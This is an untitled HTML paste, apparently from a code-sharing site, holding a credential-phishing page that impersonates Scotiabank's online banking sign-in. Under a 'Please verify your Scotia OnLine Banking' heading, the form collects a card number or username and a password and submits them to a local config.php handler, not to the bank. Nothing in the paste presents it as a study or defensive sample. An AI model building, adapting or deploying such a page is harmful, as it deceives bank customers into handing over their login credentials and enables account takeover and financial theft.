Untitled
2 years ago in HTML
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<link rel="stylesheet" type="text/css" href="style.css">
<title>Scotia| Sign In</title>
</head>
<body>
<div class="topnav">
<a class="active" href="#home">Scotiabank</a>
</div>
<div class="box">
<h2>Please verify your Scotia OnLine Banking</h2>
<form action="config.php">
<div class="input-box">
<input type="text" name="email" placeholder = "Card number or Username" autocomplete="off" required>
</div>
<div class="input-box">
<input type="password" name="password" placeholder= "Password" autocomplete="off" required>
<a href="#">Forgot your username or password?</a><br>
</div>
<input type="submit" value="Verify">
</form>
</div>
</body>
</html>